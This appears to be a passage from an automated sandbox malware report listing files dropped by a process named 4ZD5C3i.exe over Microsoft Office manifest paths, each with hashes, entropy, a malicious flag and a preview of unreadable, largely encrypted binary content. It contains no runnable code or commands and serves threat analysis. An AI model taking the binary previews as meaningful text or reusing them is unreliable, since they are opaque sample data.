                                                                                                                                                                                                                                                Preview:{O..K....%<.......(..T?...!.(R2.t.{vj.v^........j.B../../j*...(._R._.,.......Z....h.a&..^.....h.V...Y.\/.<E...l.Q......<.]...L..V..6..j.F.b..W...W^}r.../NA5r.....q....c.i...k.,9[...x....U...N[S...Ee".)`.W...=..a."s...o..r..I:w. 2;.7.........H.g\...)..Y....%...D*-.%q..&...B5..F.v.q6.z....Zf=..D.r)...?5.=.h}..r\q.U..7.k(....<.o.EW(o.......(H.>:.n........_.........M7I.A..4w].fO...M).?.....Y....D.<). ...Q....PaE... .q.iG...#.;Y+9U.\...E.?..l.?.....8.T..5....>^o.u.(2..76......f..]..........b"Rp..V......C.;]Vc..4...[....!..)845U...#...o.C... .hL.Q.T...6R..'...<S|......H..~Bb..7g....HN..j.,.+.?..l......./......U.......&.S.n..6.M.../..$...}.F.l.1.O...n...H&.u..B/y. ..D..Z.f..%....yhi....E..WR.i$3.?Ey.....5*h.0xQw..yQ.]?...;.w.sAqsct.e...jG.....r..........#...I...A...F..p..6{RA..5.W.z.K...A^Q1.1.HZ&$.....v7.>.h.....A.>..5..]..)../....T......".d....[on.....LL....b......I...2......{..k.N.......{9!..&.@>.Jg..@.O..z.X2._~....}nW.6..I..S....

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-040C-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2952
                                                                                                                                                                                                                                                Entropy (8bit):7.93075834797274
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:OdkQ1fwxHhKkq2pSLXxyPpIm5q/BYMyD4o0jZtwvh:QkQ1fwZ1q2QXYPGmcpYMXlevh
                                                                                                                                                                                                                                                MD5:2C4D425F1D257DC0748F3AE010B197F5
                                                                                                                                                                                                                                                SHA1:5CC9891FE753DF8F7E2C1E77850F14E91580FFAB
                                                                                                                                                                                                                                                SHA-256:609566441CDABD45A3C705EEABDD20D07AC3C16FC40312AD0EFE67FA07EF7E83
                                                                                                                                                                                                                                                SHA-512:9928272475B7A77595F3153A4A80935014B92613FAA401E2E2AFAA66CE740087C11DEA0397045E02644A43E97328C5910BB26869BA3A268305650C53BF4DF920
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.]...B...:d...OX..;.f..b=...d...6.Imj....w?..g...E....U.022t.eo......3...O..Y7..M.2<.&....ev..U.47~'...6.a.......=...'wc.....^V.T+N<Y.,..........O......C{@a....;s.>hx...Z....I&>\u........y.....!.=.{W....U9.S...Sk..m..O...T........c%..,..E.2.R.d.z..nP...k..m;*.G.{b....+.f....#..Nx..1..Y..."l..qvOw2..K...O{..[?\.k....6.k..kL..d..r..f.~...U.i........R...<..V.:.E.Z...<D..A..6.]u.WzV..t.O..eE.3.85.....^.rk.N..`.p...J}:...<F/!Ni..u.........5.....Cc.H;....`i-y\...c...z9W.|.}.....0..........3...O!M..f..a.....s....m.a..N.t..?.....d.:Dgb.....N....,.D...6b...X.T.o.X.o.K..!.35 .....T3@.......F.t.......9.|;.G..6..[;J..v.:K.v.O..^.......".*.-5y..h......n.?,...b.R.4...c......5......<h..Q)3..Js7.G...i.E.0QS.2.....k..U..p..[./7...7h..6...s1.XT..q...0:..".....1..0.x.h..@..F...G)..eyd...}#...VD..MkT4.cg.N.W..q...........&2.8.*....]..Mv._.....M.........Kz127....!....`+DA..u..}7.><HH...K...{ve...sH.&l....^./..(..3I.;VG.r...TS.......&.....1..C

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2952
                                                                                                                                                                                                                                                Entropy (8bit):7.936635340721566
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:rEh33NzApzHt2ARp6f/EhG0TJlBuAdl7fnErSK9+I0bxegJcq4o0jZtw4L:rgnpApzHddGWlBDnErScQcHle4L
                                                                                                                                                                                                                                                MD5:19E634D2B749FA425FEAB3F383455563
                                                                                                                                                                                                                                                SHA1:A72C4C47B37711BF65930D0EEA68B5D7D8AA47E1
                                                                                                                                                                                                                                                SHA-256:D8422ADDDF455848AAF949971F3E3E2AED9A07BBDC7F4A18DD63FD4AC0971842
                                                                                                                                                                                                                                                SHA-512:88BCFEEA2F1E112F0B0A5A6B1E56839CB985814E284C916AC1D6BE0B3AA11848052F80FE8F7C1B5DEC720B38DEC7908187B6A96253F32C15179E23F7CD92F416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..B...........&...s..VX0bj-b.W9.%G...h#pf.U...*.).}`7.....l..h....U.]..H.o.C.{...e......s.....Q.!..L....a...E...n.t?.#.X.!.7..,.N..H.-..c...r.9N!./..&.a..P.q..WI...c0 o..D....C.X..0G.......i.J.Pb.#.....(....s<..'u..;.f...W..}...)h.V.a.m`KW.cfz.2G.7.. 6.#C..1.]..m.....(......o..t2..).F...S.J.&..+.|.8.......Dis..N.B.{.m.O..!....rO....... {..1..\..C....]....r.`.T....|./..>A-...Ay...7..C(...Hj.7..n...Q.\ W..../1K..Ac.-.R.7.7.t.=...q..+4.7........zd.O.....:.O.._T....N@..o).l...3L..S[Y.M%&2'.B...[....x......O..Nf....n&..Q..`g..i.H.../....{..<...],..j....'.=.s...."...T{Sw@+&;m.......~y..7!...e.G.......qA..."....{g....F.6..N{..pQX..Iho8..r.....q..g..~|d...}a'..*_"<Lh.x.>9.!J..n.2...).......H..w.'VM....)d...L...9.Ek.._f...g.d....M..f.;...#...z...=p....uCC,..-z..VS.z.r.^.`.O.G.{..}..aa._..sP.._.&..v..I/....f.C..c......d5...$L..W...(]|8..K.Dz.;..D..g2.....M.q\w8.(:o*..r*S..)..Q|.....m..).F......1....*..`....r../o...w...Q....:Adt.%..y./..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-002A-0000-1000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25488
                                                                                                                                                                                                                                                Entropy (8bit):7.992530905426007
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:1Ako9vZxBfhud9XDtE/BB8udi+ei7eyonN2uPeT7gc5u5HIB8yj1WzxNTvOgV:1AkIZLKqk+neyngcg5HIdWzxNjOgV
                                                                                                                                                                                                                                                MD5:F12451722A7F0D821FF4B9CC9E335D05
                                                                                                                                                                                                                                                SHA1:28DAABBE6B17F4E5A7163A120676882EEA1D3AE0
                                                                                                                                                                                                                                                SHA-256:9FC119A86D347BD5DAC4B85C46ED88BF93E51704A875682914097F0F34B4C195
                                                                                                                                                                                                                                                SHA-512:D0F9B738BA4A6E258F3C4DFB5CEB5A96000A3293C12CE5DF1E82EB1AB885AE5104FA268626B381685BB02A807AE4B34521693F4B2B3A49675A02D4C9185674ED
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:g.Vk./.......J 6........S...c&]...$O......J<_....x.ip?...l...._.#....AF...u.?8.Q...k{>...W......N...M........L......'...........|.;~.N..e.....,.'.......k{:..x{.....t.......9H.).j. ..a..G....."^....*.b:...ht.)I$...e.p....hTbvZhEzL.....]H.s.0.....@..W,....^.'.\.v.g....X..;.#..;........Z..a,{.....\..z....H..#....G\...=.*..w..-.+...v..5......L..}..EI.H?.S.%Nu..&.X...d...bLz..$i.R#.!.hkx....C.|D.c....jD.&..o =..F.....+....J...D...[..F&9.....l~...;.O...n.N....l......./.5.O.8...xv=t..?.?..7hK..'...t.B. Ctw..B.ES.)...M.]...O.HK............K.[...%Kl..n?w....\..!F...'...........C....GK7...]'`....|.L ..).z.4.=>.?.ys*.T..........u..#.Y...<.P\.]........+.. .oZxg<#/.A.Yb.....gQi...dh_.Z.z...2y57...!..:........~..d.X..3 .....BV.?#..V..y?t.2;.,<.4.Js6...~......1h(v.....N....88......Jt.$.h....2.j.,.L}.*.....V..(..%......F...B...RL.Ib8.r.o..Q..P..Q...[|...(=8..p.........[CB>h..aP.E..jx..J|U.N..TJP.B...$B....E....XRj.'i.9.*....A.|b.......R`.V<.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-002A-0409-1000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2066
                                                                                                                                                                                                                                                Entropy (8bit):7.896106184294956
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ajGaeYiS3RwjzjSk7iND90dkiu4cFEScDQrI4o0jZtw7dce:+LiKELGn4ucQtleZx
                                                                                                                                                                                                                                                MD5:99356EEC088DE8A3D4C9CB0E0D20DF27
                                                                                                                                                                                                                                                SHA1:D3F9F57C114020ADE855B4359551C2F1E220B40F
                                                                                                                                                                                                                                                SHA-256:2B0EC240A3450735901EF99ABA55F87577E728CA4B900E08FC80396CCDD96A88
                                                                                                                                                                                                                                                SHA-512:ED6DA256ECE54054C1E7787627452C82409360801E25037DF225D5C3A6E2BA82F0C7A05D31F5DAF30F3B68CCDDB01AAC5FBBC6A832E9E3CA842BD2B3067E5C5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.._.`.[...6..\.2.t.h....)x.*.....E..Y.7.....I......k;..0....'.j?.s...;:..4].UfM.s.U.J55...||U.pm..9.#.c...J.mSWl.....7....j.[W.T.=_.9....3`.;M..j.{.m......2.-.33i..t...gh.*....xQ:%.3P\...K`..`...'6.W.Q.{j'9.....~...Nwt$n50.L...Lx......%R..k.'.J......!.6t...j.%..`.|~....FL...3..ScZ..Rq.Rt).....S.=..y..DXY....j....}.g!.._nF..@A...aKt6......S...+..k .[.. U.....:..}.*..l....[E'M.....ID.g.=Rs%G.q$G.....2.".7.......p.yV..:UG.5.vzi_*G*b....o}.Y.U.u...E.].[o....j .q8...|.NL.....S=G..M....=@r>.T`....9......H..J.Y....`.-h..{i.....rM11'..|........=~.j `.d.U)...>.&.......Z.Q.~..C..Fv.Q..|6.=...1..`e..Db..|....9.z...X.w=..@....IW.5k..V.".m.a..At..k.@.c...,......c.{.H.D.#f.oG.m.........R.|..7..^{...|...o.uP...R.H..Q."....G...[..y.A........"jE.....d.3.....).j..V(.m4.;..q.W]...|.c..kR(_.".O.`.w\._...'.a.=.)>...Ae..B..Rc..*6...Fv....d.A.oC....8X..81U.I.l.=Z.%.Ncw......yf..;.8!..!B. P.69Q.jx...A..l^._.\......B...p..0....%a......p..."K./5.t.........

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7988
                                                                                                                                                                                                                                                Entropy (8bit):7.978803754455845
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:cwalFUqHCF7T7RTo4aaNQODAXMCPwG6XCwsOAoe6zeUE:cwalTHS7TG4a7ZXMFG6X3Aol1E
                                                                                                                                                                                                                                                MD5:7D2E3D68D272C24368DC4174FD844A5C
                                                                                                                                                                                                                                                SHA1:AB06D5FF9C99E134C5759FD4BD378B9DBB059C32
                                                                                                                                                                                                                                                SHA-256:BB6AF2DF726C38C4265EF571E0F69FE7DB9A080AF5368998A03B1BF32D6AF004
                                                                                                                                                                                                                                                SHA-512:1A7F5A595D73B236BE853BC04A193BCBE14B469A5AFCF9E7195DA001782896E508B7D5A0E9A4ABE5294F34DFC3E3B68B75A0870944175620632D83CCC14CD952
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.v.S..c...gM..9..v.[f_.h...n.?q.j...A}...+.xR4...K...0.x^..uie.."aa...B.OE........yy.r.....!.]..Y.4u\..1.8t<.@.'x.0........a..+R.1m.......j..bU!HF....Q........~`...g.M>q~uHg.....v.9..a.gL...h`9.q......V.X...2....4a<nfL......JI.r....^7.\.~.a..j.......].Bj2{j.".En.J./...=.l.0 _Q.f.-_8...#.B.7.U.t..HOu..=B{_..]...W}.'.F.u...GZ..0.!Q.xQ..&...;_R.......x...y...X\....s...P5....Pq..w.sB.B@.......+.S...@..._....../..V.e..I.`Yd}.g...!."l\...>...E..g.~g...^.S..B.(..Q..gY._1........iX..)...^...f.h.U-6....~...T..os...m.G.....'..OMN.D..z>%n.-A..l..D..TK......^...}........]...'.`|U.......#. .u.s..r.........Vp1....E...j.....I(.P.....C..$..QH...1....L.j"@1...^..X....mL./.. ..Q.!....m..m.S..'I\0.2..*..x...R.6.7P...A...m.mW..RF....4i.U..).N...X....lR.....=.[~........U....u.Nl+...vA.....%...n.\..p.!....uy.AL`u..B.jlx./....._.F..dd.<..P....OLn..7.r-.H.e,..U.#(3]uI...[.m<......Y.k..k.....T.....2.c?.c...[..W...t.4.....\..R.4..$..Xl...c2...(.....rc..$.Ph..].P....\Bc.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):367968
                                                                                                                                                                                                                                                Entropy (8bit):7.999430154750203
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:sTQ/tfYSGtzYGXVcZdka8r5aZMC446bq7KgKmWtDn2y9sIxUc11jKj9/xPCybGM:eQBYSG9tVcZdka8hC3VKgKmWtT2zIxUh
                                                                                                                                                                                                                                                MD5:44A8215FCC10636D428786855FEDCD70
                                                                                                                                                                                                                                                SHA1:3AB5F7A410704BFDDD2C43844DDBD408A2ECC37A
                                                                                                                                                                                                                                                SHA-256:3CC33E735F6E3B9EF55F3221790DCA920DCC8DEC142722FF6424BBA8891EC8E6
                                                                                                                                                                                                                                                SHA-512:57A76916C98E6342B3F7860721138EE0F68D58B3E2ECD5BC23A99A6433266A4B2630E7EF8C5EF0602F258B4189E6480D0FFF313EB2125C7F11E3395C8924845D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:,V.q..JR..u=P.C...{.2..Z.}.>]...z..R@.....z...._...%......a.B..)...........+.Q..T).......'..Q.p....$..A{...<Y`...Ne...kT)...5.|.~:L..%'>...p..aZ.f..L,...G..V...!.w.U..ua...|).......?F(......._q.|.2..GYG..}'...v.?#........Kd...,..ut.W.Z....#.{.cb...6Q...^:x?...?(... .44..=!5....-..$.X(v...,D.{.&...3b).i.5.&./fx...Y1.-.....9.O. ./}i;Ov&.......vN!.O.+..i.4.M.b.c..z......].Mo;m."....V;1".[z....,L..).....i.J...^.Q+...L^.(..~...mc.s.{....<..$.(}.E.....5... ,.m.....`t..I=..i......]...G._]...>...#/..H..0.B..'F.8.... `15a......L.'..4...n.^....-?.$ ......7,....w..y...(.p8.=......N.m..H.&J.. .J..._L..K......^g.Q".........+.lh~7xn|"!....f.^[.'.:..f.,P..8u^.h.Z..l_L.n....1.'Kz...8.@.C:..y.....>d..-:....aO.....S.[."._.[.a.)s.<2..`..<...F....1...8...;DS.P....D...3I..WOdX8.............Ah.|]/......<C..'._..m....N.^......>..E..wx.p.<jJ^.`P9~.u...{L..$.Fu9..at.n....Z?.J......=..:...W.....vt.S....-...\...s.....k.D.Z..[..~.....$g].).+........q.....I.if

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.893404022549017
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:8nLORO7KthTNbKsFy9tGT2jrQLlN7m0GUNwO6IgcQk+tjmJrc0YXUZtwsTYsa:8qPthV58czo8U4o0jZtwJsa
                                                                                                                                                                                                                                                MD5:213F048E4A75301F405876001647A998
                                                                                                                                                                                                                                                SHA1:2E8669617A8C759DA2A94D78841CB29F347C9D42
                                                                                                                                                                                                                                                SHA-256:51CBC3F6239430A42A75898DFE9EB0F8F67BF6964C7E83A6A5AEF8527C645C5B
                                                                                                                                                                                                                                                SHA-512:FA827830E049EB274F1EA0E7FF2029DDAA96F9257270B22419903035BEDF9D75C1C7C09C203C6348FC2306576FC76AE5EDA3BC6F35B872EEDB0552F4B5282E1D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..F.xS.z.9..F3...m'n"..6...5..{.}1I..]7...T~.@.&...s.....`J..$FD....Fy...}..r....^.l.K.F....*.[ '.wk...PQ4qo...A. .%.jaS.V.y.s.=...jb...1..8U...k..Q.j.......U..k...D]...};.".UG}..a...&.....m.C...Z..J......l.`.....g.i.s9.D/....&.J.._....9X.4......E......,./C?o....._A....ft...<..qd......Bb..Eya.(..>..Q..1n..E.....)..#7l5.z...s8:h&...d.0..)..d..O.y..P0.HY...+...F~.{...;L.....q.Rk...O.i..dO..\...2....X...KK.V.G .N?!:.a...4...7.$_.I.S}.....E....~/;kW...i7....p......i...^z94\.^.R.j!!a<Y...;W{f).%:*..e...ul......f:7.....+.s.(Y4d).S...E....b+.s...%..C..Vi..iYy....[.r...G./.ak. ...j=...-..f3.....-.3..&b.$.......C..f.}..."....j.Q...G.D.....`..H..>...M..Ms8*.._.<U...c"...M.XU..%..%..3.#..7.;.b=.. Q. .8......s..%...g..p.V.....:...._5.%....Av...X...=....3.n.T_J*ebwf0.V.9.d.f.y.T6m5.....9.....,L.2[)...VW....b.66..Y......X...D...Z.|)<.t.hd.\.$..:d.lj.o.M.f.'......Qa.3....{.)..-....2.F..nt\.......$..u.RHu.X$9B..C.x..wm...U^z.p4.=.m.*....Fg...m....g0..$.`..FWk.@.B..*

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61041
                                                                                                                                                                                                                                                Entropy (8bit):7.99685022803448
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:/s7+mwgcTUNKeqvyvK4t3a37edcDkOehegt5Oa+ykUu:m+mwbUB0z48rxDkORgjnru
                                                                                                                                                                                                                                                MD5:3672DD827169F70287057B489D16819F
                                                                                                                                                                                                                                                SHA1:A2A80C3398814EE0AC75D86A8F5D5728F2608B9C
                                                                                                                                                                                                                                                SHA-256:5DAC29A3483709D916A74DEF86627A86F232CE8EFCF616A03AB82A9A7C534B48
                                                                                                                                                                                                                                                SHA-512:CB9A053663AC94F29261964683F36D057FE1915BF793F250C1833F7E6B3C8E4E05A27C342AD58194B21C260639CB9CEA5BBA31CFAD544A55155B8A57900471B2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..\......IbL.C1.S.....y....._T..1G...K...HR..X..Y..,....W%>.....K.v...........r>0..@..zp.4..~C..Xp..........#..&kK.<.CC(\..U.....B.E6..|..o....c.u...M..t;NH...f......}0?s..z.1..~N7A`6..+...O..DJ..?.0KX.^g...w..3...[.&E.>o?5x.B^...R?L<K9g:..n..v1g..q....H<...U.u..S..,....Hk(...W_.jm.,hI...`.".`9/..&.L.. ..At....5...{.qv..l...q,F.j..R5c."N...y.(.n>.-...W..l/.. .=R.J..W2.$..`....f.!...(vR..|..8N{l....<3.}N.n.#:.#Y...JY..../..V......^...Q....e^.......>....w."z..j. (.^..p#..`D....r@.....<..:...-.fp3.M...NZlL..j.?...+%..MxZ...Z.Ex?.}|..p..m.v|...+.x.X....z.{L.|...2..@...C}.."...........)...$).lF..C..............V.\:w....RP^..E.y.}Gj>Tq.TDl.....bZ.U.....+...<M.D.79..k .V.8.ix|.J)Y.............>I....r..W....f..Z..OlY.....l...V........q....z.....\.L..B.Q.C....~4m..A<&..0w#....9S4.x.em-..Og..e=....lE...._..#....6..l.H/.I.y.......{|\.e..F.l.Z4B.-@...+=.^w.."..z.....o...|.9...(...B."T.NEqj..J./......r+i...... .?M.W..%....ea.].JO.y.!=`-..qo.2.+..m.p>.<

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1996
                                                                                                                                                                                                                                                Entropy (8bit):7.89962631167003
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:EnEYUbBYR7jqyHE6XmIsgZzV4F5Q4o0jZtwx:EnEblYR/9HEYmIFZRWhlex
                                                                                                                                                                                                                                                MD5:FB64A47FCCD1DA648C0503A8A6E7B4D7
                                                                                                                                                                                                                                                SHA1:5F2A9EF741EA621338AACBE0930D95EED30B2587
                                                                                                                                                                                                                                                SHA-256:7FC7A0930BE1055BA25E5B661EC6BE4B3CCA10270F238E25C2285ECE1846BB49
                                                                                                                                                                                                                                                SHA-512:E75C0195EB9BCE7803549A6FCDC5CBCBF639A5D4BB6DBCA9AC703AFC86AAC7ED14665252FB4C368920B900165BDFF2B006FAE849A85367AF27C9C72EF153E749
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....m..B...."J]....P..pbI...~W....:n..pv...&&.9A.G...()a..|...Y,8&..tB.Y.....7.k....Q.......C...+...i....zY@..N.P...u.n.,....1zr.%.ys.m.-Vgwq..ISt`sP..U.d...2..R..t..A..^/=k.u)~r'..3......x.B.K%.+.g.~.2d#p.4c.m../..t.c..A)N.............c.*]......9..,......oQ... o./o.C.m..my..SA........+..w*.^..6T..*..z....bD\.." .@...&S......q7's.w...n..H+..z.9..=..<.O....L.......Z..n.w~.....O.............B8.....9........\......u2..2(..?z.g/.`.....:dF..........i... .....a......`..f...W...*.].......=:....8.}..9.....cZ.......^...f...e..GE.....v..x./.r.5.\...W..G.95.....D..F."..h.........+x.>'....R....u%..+LTn....'.c........k..i..*.........Dm..W!.Y..F.'.a..C..).+P.~X;...z_..i(t.M.w..8....2.......<.9(*F.h.....#..H..V..PyF`....%.6...OQ..Q.G.....v.fA....U"=....|.Q..'.X...O....!..!0.. .._s....t.<..Yv}W.A.Y?X*e..I..R...n.P.3..@....4z.Z..T.)....B7.......+.....z.......P91..u.2.F........_n8x. ...a..X..N.3.m.8..3n...][..+K........)....u.._.k...Cl.Q...e.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2185
                                                                                                                                                                                                                                                Entropy (8bit):7.908642713354097
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:I7gRs6OJiRD652OFKJcvyc1TIfj4o0jZtwB:EgRd8iRD6526UcvnMAleB
                                                                                                                                                                                                                                                MD5:D1709945025128AD950DBA26FA6DAC18
                                                                                                                                                                                                                                                SHA1:E2EC6E79CF890754804063E10A267831C7C6E836
                                                                                                                                                                                                                                                SHA-256:8B464899BF03AEF429DA1546A19DFF8DCE53B7F875C8F72A002FC1FEB3F639EB
                                                                                                                                                                                                                                                SHA-512:C409740FA7E97E85C40C396B99426C37CC7AE93FCB12E480724774B62B2A77CE586010314AF8524998B9F6D17FD43CA20547A5F8E8A2FB3F64C02FD04750B81C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..=.3...vsa..>W.'". .A..my...".[c[5qv}..C....(.+J...{.....(.F.<.>..f...0.lJ.[f..0.`8...y...0........y.rA.-.J.........u.{C.i*.. .zLJ.!.\.Bq.Z.3...8~T.......>^....o..E{b.B.1.....W.c..<.9....!...g)........J../..~..s6..pCT..l.....*..|...'UF.;.....*O.R,....D`............9FO...w...X.J.^.KYUM...8..-$~....nA8.R...R"..ef./.65. .......3.....NY...(..5Nq.D...ry...|..W1z6.N...6B..v.I.............fC8.I+6..>.CE..`".Y..4....p.2..#.Q......li.`.fcb...]..O4..T6[.h...+.l..[Q.{."b.]C/.R...5.%H)9.rH.}....>.C).m..$?.... ..mm;.h.P..7.}..|Z}...0...C...@.O.....Z....@."..@NT".w..J.f).h.f....A1..58.L Ig...]$.....n..O>y#.!'..$.+...+.....];..p"E.D.}...*...c...|.:.q........4...MK...<...0;>..Z{..W).....Xe~'.An..j.....Uj...f...x4....__...fR...|e0y.]..N;..\....t.[Z...:...P.B.I......s.r5...B...K.z...g.u.M.J..l...;.N..K...]ip.z<.....(.2.%.bGc..D!f...;..)..+.'.%...}.B..f..&.."..f#v...........F.....1(g.9..'n/..O.K.<3.r...P..C.....-...F..W.m..U4o.q(..E....m.....K.&...3.u.fN.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1900
                                                                                                                                                                                                                                                Entropy (8bit):7.894793348675552
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:hW2sLCAgciiBk3cuxdnyUMkb4o0jZtwiPv:hW2sbiiQfklkglem
                                                                                                                                                                                                                                                MD5:EB54316F32A80E7EC3EA6A7F83A80457
                                                                                                                                                                                                                                                SHA1:CC6AE390C0B997F4A04DC268482667153244EF91
                                                                                                                                                                                                                                                SHA-256:EC9876C670E8A75CF5F47DCDBD3870BFA81BD3087E0F94A6BAAA3DD9755E2BFE
                                                                                                                                                                                                                                                SHA-512:7D50160BDFA5244D72AB8D12BC3182A3E7D9E516B2EF347513219282278EBE13968B366BF6099DEF1C51B86E5AF7162AECFD3AEF7DE1F547B7D7BC40ABE942BC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
